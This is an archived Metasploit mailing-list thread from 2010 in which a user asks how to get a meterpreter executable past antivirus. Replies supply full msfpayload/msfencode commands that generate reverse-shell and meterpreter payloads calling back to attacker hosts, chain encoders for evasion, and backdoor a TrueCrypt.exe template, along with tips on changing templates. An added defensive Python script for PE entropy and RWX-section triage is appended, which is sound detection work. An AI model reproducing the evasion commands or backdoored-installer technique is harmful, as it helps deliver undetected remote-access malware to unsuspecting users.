Metasploit mailing list archives

Re: Shikata_ga_nai evasion...


From: Terrence <secretpackets () gmail com>
Date: Sun, 14 Mar 2010 15:14:06 -0400

Are you using an online av checker? Or do you know the av your client is using?


On Sun, Mar 14, 2010 at 15:07, netevil <netevil () hackers it> wrote:

Check out the metasploit unleashed section on av bypass

./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R \
  | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 \
  | ./msfencode -e x86/call4_dword_xor -t raw -c 10 \
  | ./msfencode -e x86/countdown -t exe > /tmp/6.exe

Hi Terrence,
I've tried the command above but the results are getting worse...
now I have many (15) other AVs that sign my exe as suspicious..

David





On Sun, Mar 14, 2010 at 14:33, netevil <netevil () hackers it> wrote:
here it is Terrence!

sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.253.128.220 LPORT=53 R \
  | sudo ./msfencode -t exe -x /home/john/pentest/TrueCrypt.exe \
      -o /home/john/pentest/TrueCrypt_backdoored.exe -e x86/shikata_ga_nai -c 5


Send the command you are using to generate the payloads.


On Sun, Mar 14, 2010 at 14:24, ricky-lee birtles <mr.r.birtles () gmail com> wrote:
Try using some of the tools from
http://technet.microsoft.com/en-us/sysinternals/default.aspx as
templates.

As well as trying to use a different payload, to see if that brings
any different results.
Regards,
-- Mr R Birtles



On 14 March 2010 18:04, netevil <netevil () hackers it> wrote:
Confirmed!..also changing template (TrueCrypt.exe, Mame.exe...)
results don't change...

David


Have you tried using a different .exe template? The default one is
what most AV vendors are using to pick up Metasploit's outputted
exes.

Yes Ricky!
I've tried with an original putty... and this template is a flash movie.
I'm going to do the third test with another template.. and see if the
results change...hoping at least for symantec..

thanks
David


Regards,
-- Mr R Birtles



On 14 March 2010 17:40, NetEvil <netevil () hackers it> wrote:
Hi guys
I'm doing a pentest using my meterpreter exe encoded with shikata ga nai..
and I see it signed as suspicious by symantec and microsoft...
Do you have a quick solution for evading these AVs? I've tried some packers
but got the same results...
If not ...I know the hex editor is waiting for me...

Thanks...have a nice sunday!
David


Sent from my mobile device
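The thread's recurring observation, summed up in Ricky's remark that AV vendors key on the default EXE template and David's report that stacking encoders only made more engines flag the file, is that an encoded payload stapled into a host program leaves structural traces a scanner can see without ever running it. The following is an added Python example, not code from any poster in this thread or from Metasploit, showing the kind of static triage a defender can do on a suspect binary: parse the PE section table and flag sections that are writable and executable at once, or whose byte entropy is near the 8-bit maximum that encoded or packed data tends to show. The 7.0-bit threshold, the `pe_sections`/`triage` names and the constructed sample PE are assumptions chosen for illustration; to check a real file, read its bytes and pass them to `triage`.

```python
"""Static triage of a PE section table: entropy and RWX section flags.

Added example for this thread; not code from the list's posters or from
Metasploit. The 7.0-bit entropy threshold and the constructed sample PE
are assumptions chosen for illustration.
"""
import struct
from math import log2

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
ENTROPY_THRESHOLD = 7.0  # assumed: bits/byte above which a section looks encoded or packed


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * log2(c / n) for c in counts if c)


def pe_sections(blob: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]   # NumberOfSections
    size_opt = struct.unpack_from("<H", blob, coff + 16)[0]      # SizeOfOptionalHeader
    table = coff + 20 + size_opt                                 # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        (name, _vsize, _va, raw_size, raw_ptr, _r, _l, _nr, _nl, chars) = \
            struct.unpack_from("<8sIIIIIIHHI", blob, table + i * 40)
        data = blob[raw_ptr:raw_ptr + raw_size]
        rwx_mask = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "raw_size": raw_size,
            "entropy": shannon_entropy(data),
            "rwx": (chars & rwx_mask) == rwx_mask,
        })
    return sections


def triage(blob: bytes) -> list:
    """Names of sections worth a closer look: high entropy or writable+executable."""
    return [s["name"] for s in pe_sections(blob)
            if s["entropy"] >= ENTROPY_THRESHOLD or s["rwx"]]


def build_sample_pe(sections) -> bytes:
    """Construct a minimal, non-runnable PE32 image for testing the parser.

    sections: list of (name, data, characteristics). Headers are zero-filled
    except for the fields pe_sections() reads.
    """
    e_lfanew, size_opt, file_align = 0x40, 0xE0, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x0102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    headers_end = e_lfanew + 4 + 20 + size_opt + 40 * len(sections)
    raw_ptr = -(-headers_end // file_align) * file_align  # round up to file alignment
    first_raw = raw_ptr
    table, body, va = b"", b"", 0x1000
    for name, data, chars in sections:
        raw_size = -(-len(data) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += data + b"\0" * (raw_size - len(data))
        raw_ptr += raw_size
        va += -(-len(data) // 0x1000) * 0x1000
    image = dos + b"PE\0\0" + coff + bytes(opt) + table
    return image + b"\0" * (first_raw - len(image)) + body


# Constructed sample: a plain code section, a zeroed data section, and an
# appended read-write-execute section filled with uniformly distributed bytes.
SAMPLE_PE = build_sample_pe([
    (b".text", b"\x55\x8b\xec\x33\xc0\x5d\xc3" * 70, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
    (b".data", b"\x00" * 512, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".blob", bytes(range(256)) * 16,
     IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
])

if __name__ == "__main__":
    for s in pe_sections(SAMPLE_PE):
        print(f"{s['name']:<8} size={s['raw_size']:6d} entropy={s['entropy']:.2f} rwx={s['rwx']}")
    print("flagged:", triage(SAMPLE_PE))
```

Entropy alone is a coarse signal (compressed resources and legitimately packed installers score high too), which is why the check pairs it with the section permission bits; a section that is both writable and executable in a shipped binary is unusual enough to deserve a look on its own, and the two heuristics together are a cheap first filter before any engine-based scan.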
--------------------------------------
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
